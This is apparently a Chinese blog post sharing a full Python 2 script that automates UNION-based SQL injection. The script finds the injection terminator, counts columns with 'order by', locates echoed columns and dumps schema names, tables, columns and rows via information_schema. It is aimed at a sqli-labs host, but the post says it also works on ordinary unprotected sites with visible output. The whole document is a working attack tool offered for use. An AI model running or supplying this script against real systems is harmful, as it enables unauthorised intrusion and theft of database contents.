此脚本能实现最基础的联合查询注入。

此脚本除了能在mysql-sqli1-5关中使用之外,还可以在一般的无WAF且有回显的漏洞网站中使用。可以自动判断截断符号,自动跑出所有的数据。

脚本如下:

# coding=UTF-8
import requests
import re
import base64

import sys
# Python 2 only: site.py removes sys.setdefaultencoding at startup and
# reload(sys) brings it back so the process-wide str<->unicode default can be
# switched to UTF-8 (str() on the unicode response text relies on this).
# Neither reload() as a builtin nor setdefaultencoding exists in Python 3.
reload(sys)
sys.setdefaultencoding( "utf-8" )

# 验证是否有注入
def yanzhengceshi(url,html_text1):
    """Probe which comment terminator makes *url* return a baseline-like page.

    Tries the two suffixes in ``zhushifu`` in order, fetches ``url + suffix``
    and compares the response length with ``html_text1`` (the baseline length
    measured by the caller).  The first suffix whose response length differs
    by fewer than 8 characters is stored in ``jieduan[1]`` and the probed URL
    is returned.  When neither suffix passes the function falls off the loop
    and returns None, leaving ``jieduan[1]`` untouched.

    Args:
        url: request URL already carrying the quote/paren prefix under test.
        html_text1: length of the untouched baseline response body.

    Returns:
        The first matching probe URL, or None.
    """
    global jieduan
    zhushifu = ['%23', '--+']
    for i in zhushifu:
        xurl = url + i
        print xurl
        # No timeout is passed, so an unresponsive host blocks here indefinitely.
        rurl_text = requests.get(xurl)
        html_text3 = len(rurl_text.text)
        print html_text3
        # Computed but never read.
        rurl_base = base64.b64encode(rurl_text.text)

        # Pure length-delta heuristic: "looks like the baseline" means within 8 chars.
        html_chaju = abs(html_text1 - html_text3)
        if (html_chaju < 8 ):
            jieduan[1] = i
            print xurl
            return xurl

# 找到报错点
def ceshi():
    """Test one quote/paren prefix (the global ``i``) for an injection point.

    Uses module globals set by ``testsql``: ``start_url``, ``i`` (the prefix
    under test), ``lists`` and ``jieduan``.  Three response lengths are
    compared:

    * the untouched ``start_url`` (baseline, ``html_text1``),
    * ``start_url + i + ' and 1=2'`` with no terminator (``html_text2``),
    * the terminator probes issued by ``yanzhengceshi``.

    When the ``and 1=2`` page differs from the baseline by more than 15
    characters and a terminator probe matched, the probe URL is appended to
    ``lists`` and the prefix is recorded in ``jieduan[0]``.  Nothing is
    returned; the outcome lives in the globals.
    """
    global start_url, i, lists, jieduan
    global jieduan

    # Baseline request on the unmodified URL.
    start_url_text = requests.get(start_url)

    print start_url

    html_text1 = len(start_url_text.text)
    print html_text1

    # Computed but never read (same for url_base below).
    start_url_base = base64.b64encode(start_url_text.text)
    # URL with the prefix under test appended.
    url = start_url + i

    url2 = url + ' and 1=2'
    print url
    url_text = requests.get(url2)
    print url2
    html_text2 = len(url_text.text)

    print html_text2
    url_base = base64.b64encode(url_text.text)

    # None unless one of the comment terminators produced a baseline-like page.
    jieguo = yanzhengceshi(url,html_text1)

    html_chaju = abs(html_text1 - html_text2)
    print html_chaju
    if (html_chaju > 15) and jieguo:
        print jieguo
        lists.append(jieguo)
        print "i=={}".format(i)
        # A later prefix that also passes overwrites this; lists[0] keeps the first hit.
        jieduan[0] = i

# 拼接截断字符
def testsql():
    """Try each quote/paren prefix and report whether an injection point was found.

    Resets the module globals ``lists`` (matching probe URLs) and ``jieduan``
    (``[prefix, terminator]``), then runs ``ceshi`` once per entry of
    ``playload``; every prefix is tried even after a hit.  Returns ``jieduan``
    when at least one prefix matched, otherwise prints a message and calls
    ``exit()`` so the program stops here.
    """
    global start_url
    global start_url, i, lists, jieduan
    lists = []
    jieduan = ['', '']
    # Prefixes tried in order: ', '), ", ") and the bare parameter.
    playload = ["\'", "\')", "\"", "\")", ""]
    for i in playload:
        ceshi()
        print i
        print lists
    if lists:
        print "[!]存在注入,注入点为{}".format(lists[0])
        return jieduan
    else:
        print "[!]不存在注入,程序退出"
        exit()

# 查询字段位数
def chaziduanqingqiu(czdqq_url):
    """Fetch *czdqq_url* and return the length of the response body text."""
    shuju = requests.get(czdqq_url)
    html_text4 = len(shuju.text)
    return html_text4

# 拼接字段位数
def chaziduan():
    """Estimate the column count of the injected query with an ``order by`` sweep.

    Builds ``start_url + jieduan[0] + ' order by N' + jieduan[1]`` for N in
    1..14 (14 requests against the same parameter, an easily logged pattern),
    records each response length in ``ziduanshu`` (index N-1), then looks for
    adjacent lengths that differ by more than 5 characters.  A jump between
    ``ziduanshu[i]`` and ``ziduanshu[i+1]`` is reported as column count
    ``i + 1``.

    Returns:
        List of candidate column counts; empty when no length jump was seen.
    """
    global start_url, jieduan
    # print "截断{}".format(jieduan[0])
    # Both initial values are overwritten or never used below.
    chushi = ''
    czd_url = start_url
    ziduanshu = []
    zhuruziduan = []
    print "截断[0]为{}".format(jieduan[0])

    for i in range(1, 15):
        czd_url = start_url + jieduan[0] + ' order by ' + str(i) + jieduan[1]
        print czd_url
        print i
        shuzhi = chaziduanqingqiu(czd_url)
        ziduanshu.append(shuzhi)
        print ziduanshu

    for i in range(len(ziduanshu) - 1):
        # ziduanshu[i] belongs to "order by i+1"; a jump right after it means i+1 columns.
        if (abs(ziduanshu[i]-ziduanshu[i+1]) > 5):
            print "[!]注入字段数为{}".format(i + 1)
            zhuruziduan.append(i + 1)

    print ziduanshu
    return zhuruziduan

# 查询显示位
def chaxianshiweiqingqiu(strings, liebiao):
    """Fetch *strings* and report which ``0xxk<i>`` markers appear in the body.

    For every index ``i`` of *liebiao* the body is searched for
    ``[^']0xxk<i>[^']`` -- the marker with a non-quote character on each side,
    presumably so a quoted ``'0xxk<i>'`` echoed from the request itself does
    not count (assumption, not verified here).  Indexes whose marker is found
    are collected and returned.

    Note: the pattern is not anchored on a digit boundary, so the search for
    marker ``i`` also succeeds on ``0xxk<i>0`` (``0xxk1`` inside ``0xxk10``)
    once more than ten markers are in play.
    """
    shuju = requests.get(url=strings)
    xiabiao = []
    print shuju.text

    for i in range(len(liebiao)):
        r = r"[^']0xxk{}[^']".format(i)
        print r
        jieguo = re.search(r, shuju.text)
        print jieguo
        if jieguo:
            print i
            xiabiao.append(i)
    print xiabiao
    print "---"
    return xiabiao

# 拼接显示位
def chaxianshiwei():
    """Find which selected columns are echoed into the page.

    For each candidate column count ``m`` in the global ``ziduan`` it builds a
    ``union select`` whose columns are the string markers ``'0xxk0'`` ..
    ``'0xxk<m-1>'`` (comma-joined, no trailing comma), wrapped in
    ``jieduan[0]`` / ``jieduan[1]``, and asks ``chaxianshiweiqingqiu`` which
    markers came back.  Candidates that echo nothing are skipped; the first
    ``m`` that echoes anything sets the global ``xunhuanziduan`` to ``m`` and
    its index list is returned.

    Returns:
        List of echoed column indexes (0-based), or None when no candidate
        echoed (the function falls off the loop).
    """
    global start_url, ziduan, jieduan,xunhuanziduan
    print "[!]可注入的下标为:",
    chushi_url = start_url
    xianshiziduan = ziduan
    xiabiao = []

    for m in xianshiziduan:
        liebiao = []
        MC = ''
        stringS = ''
        strings = ''
        for i in range(m):
            MC = '0xxk' + str(i)
            mingcheng = MC
            liebiao.append(mingcheng)
            stringS += '\'' + mingcheng + '\''
            # Snapshot before the comma so the final value carries no trailing comma.
            strings = stringS
            stringS += ','
        strings = start_url + jieduan[0] + " and 1=2 union select " + strings + jieduan[1]
        print strings
        print '666'
        print liebiao
        xiabiao = chaxianshiweiqingqiu(strings, liebiao)

        if not xiabiao:
            continue
        xunhuanziduan = len(liebiao)
        print len(liebiao)
        print "12345"
        for i in range(len(xiabiao)):
            print "{}".format(xiabiao[i]),

        # NOTE(review): indentation was lost in the source; the return is read
        # as sitting inside the loop (stop at the first candidate that echoes).
        return xiabiao

# 在这里取出爆破出的数据
def zongchaxun(ChuShi_url):
    """Fetch *ChuShi_url* and pull out every ``***value***`` fragment.

    The extraction payloads wrap each value as ``'***',value,'***,'`` so the
    pattern in ``r`` captures the text between two star triplets (commas
    excluded).  Each match is converted with ``str()`` (which relies on the
    UTF-8 default encoding set at import time) and the list is returned --
    empty when nothing matched.
    """
    shuju = requests.get(url=ChuShi_url)
    r = r"\*{3}([^,]*)\*{3}"

    CXlist = re.findall(r, shuju.text)
    for i in range(len(CXlist)):
        CXlist[i] = str(CXlist[i])
    return CXlist

# 在这里拼接所有的PlayLoad
def pingjiePL(yuju):
    """Place *yuju* into the first echoed column of a ``union select`` and run it.

    Builds ``start_url + jieduan[0] + " and 1=2 union select " + <cols> + " "
    + jieduan[1]`` with ``xunhuanziduan`` columns: position ``xiabiao[0]``
    receives *yuju* (which every caller already terminates with a comma),
    every other position receives its own index as a literal.  The finished
    URL goes to ``zongchaxun`` and its extracted list is returned.

    Uses the globals ``start_url``, ``jieduan``, ``xunhuanziduan``, ``xiabiao``.
    """
    global start_url, jieduan, xunhuanziduan, xiabiao
    chushi_url = start_url + jieduan[0] + " and 1=2" + " union select "
    for i in range(int(xunhuanziduan)):
        if i == xiabiao[0]:
            chushi_url += yuju
        else:
            chushi_url += str(i)
            # NOTE(review): indentation was lost in the source; keeping the
            # snapshot and the comma in the else branch is the reading that
            # matches yuju's trailing comma -- confirm against the original.
            ChuShi_url = chushi_url
            chushi_url += ','
    print '\n',
    ChuShi_url += " " + jieduan[1]
    print ChuShi_url
    # Shadows the builtin name ``list`` inside this function.
    list = zongchaxun(ChuShi_url)
    return list

# 开始暴库
def baoku():
    """Enumerate schema names through ``information_schema.schemata``.

    The subquery wraps every name as ``***name***,`` so ``zongchaxun`` can
    pick it out.  Prints and returns the list when anything came back;
    otherwise prints a message and returns None implicitly.
    """
    global start_url, xunhuanziduan, xiabiao
    global jieduan
    yuju = "(select group_concat('***',schema_name,'***,') from information_schema.schemata),"
    playload_ku = pingjiePL(yuju)
    if playload_ku:
        print "网站数据库有:"
        for i in playload_ku:
            print i
        return playload_ku
    else:
        print "网站没有数据库"

# 开始爆表
def baobiao():
    """Enumerate table names of the global ``table_schema``.

    ``table_schema`` (typed by the operator at the ``raw_input`` prompt in
    ``main``) is spliced into the ``information_schema.tables`` subquery
    as-is.  Prints and returns the table list, or prints a message and
    returns None implicitly.
    """
    global start_url, xunhuanziduan, xiabiao, table_schema
    global jieduan

    yuju = "(select group_concat('***',table_name,'***,') from information_schema.tables where table_schema='" + table_schema + "\'),"
    playload_tables = pingjiePL(yuju)

    if playload_tables:
        print "{}数据库有如下表:".format(table_schema)
        for i in playload_tables:
            print i
        return playload_tables
    else:
        print "{}没有表".format(table_schema)

# 开始爆字段
def baoziduan():
    """Enumerate column names of ``table_name`` inside ``table_schema``.

    Prints and returns the column list; prints a message and returns None
    implicitly when nothing came back.  ``len(playload_columns)`` is printed
    before the emptiness check, so an empty result still prints ``0``.
    """
    global start_url, xunhuanziduan, table_schema, xiabiao, table_name
    global jieduan

    yuju = "(select group_concat('***',column_name,'***,') from information_schema.columns where table_name='{}' and table_schema='{}'),".format(
        table_name, table_schema)

    playload_columns = pingjiePL(yuju)
    print len(playload_columns)
    if playload_columns:
        print "{}数据库有如下字段:".format(table_name)
        for i in playload_columns:
            print i
        return playload_columns
    else:
        print "{}没有字段".format(table_name)

# 开始爆数据
def baoshuju():
    """Dump rows of ``table_schema.table_name`` for the global ``column_name`` list.

    Builds ``group_concat('***',c1,'***,','***',c2,'***,',...)`` over the
    column list (the snapshot-before-comma trick leaves no trailing comma),
    runs it through ``pingjiePL`` and prints the values ``::``-separated,
    starting a new line every ``len(column_name)`` values.  Returns None;
    ``main`` stores that return value without using it.
    """
    global xunhuanziduan, table_name, table_schema, xiabiao, column_name
    global start_url
    global jieduan

    yuju = "(select group_concat("
    yuju_One = yuju

    for i in range(len(column_name)):
        yuju_One += "'***',{},'***,'".format(column_name[i])
        yuju = yuju_One
        yuju_One += ','
    yuju += ") from {}.{}),".format(table_schema, table_name)

    playload_shuju = pingjiePL(yuju)

    for i in range(len(playload_shuju)):
        if i % len(column_name) == 0:
            print '\n',
        print playload_shuju[i],'::',

def main():
    """Drive the whole run against the hard-coded lab URL.

    Order of operations: ``testsql`` (prefix + terminator), ``chaziduan``
    (column-count candidates), ``chaxianshiwei`` (echoed positions),
    ``baoku`` (schemas), then ``baobiao`` for the schema typed at the
    ``raw_input`` prompt, ``baoziduan`` for the hard-coded table ``servers``
    and finally ``baoshuju``.  All intermediate state travels through module
    globals rather than return values.
    """
    global start_url, ziduan, xiabiao, jieduan, table_schema, table_name, column_name, xunhuanziduan
    # sqli-labs Less-1 on a private lab host, the page's own test target.
    start_url = "http://192.168.107.128/sqli/Less-1/?id=1"

    jieduan = testsql() # [prefix, terminator]
    print "总的截断为{}".format(jieduan)
    ziduan = chaziduan() # candidate column counts
    print ziduan
    print '1111111'
    xiabiao = chaxianshiwei() # echoed column indexes
    print "可显示下标为{}".format(xiabiao)
    print "有{}位显示位".format(xunhuanziduan)
    playload_ku = baoku() # schema names

    table_schema = raw_input("请输入要爆的数据库名")

    playload_tables = baobiao() # table names

    # The table is fixed here rather than prompted like table_schema.
    table_name = "servers"

    playload_columns = baoziduan() # column names

    column_name = playload_columns

    playload_shuju = baoshuju() # row data; baoshuju returns None

# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()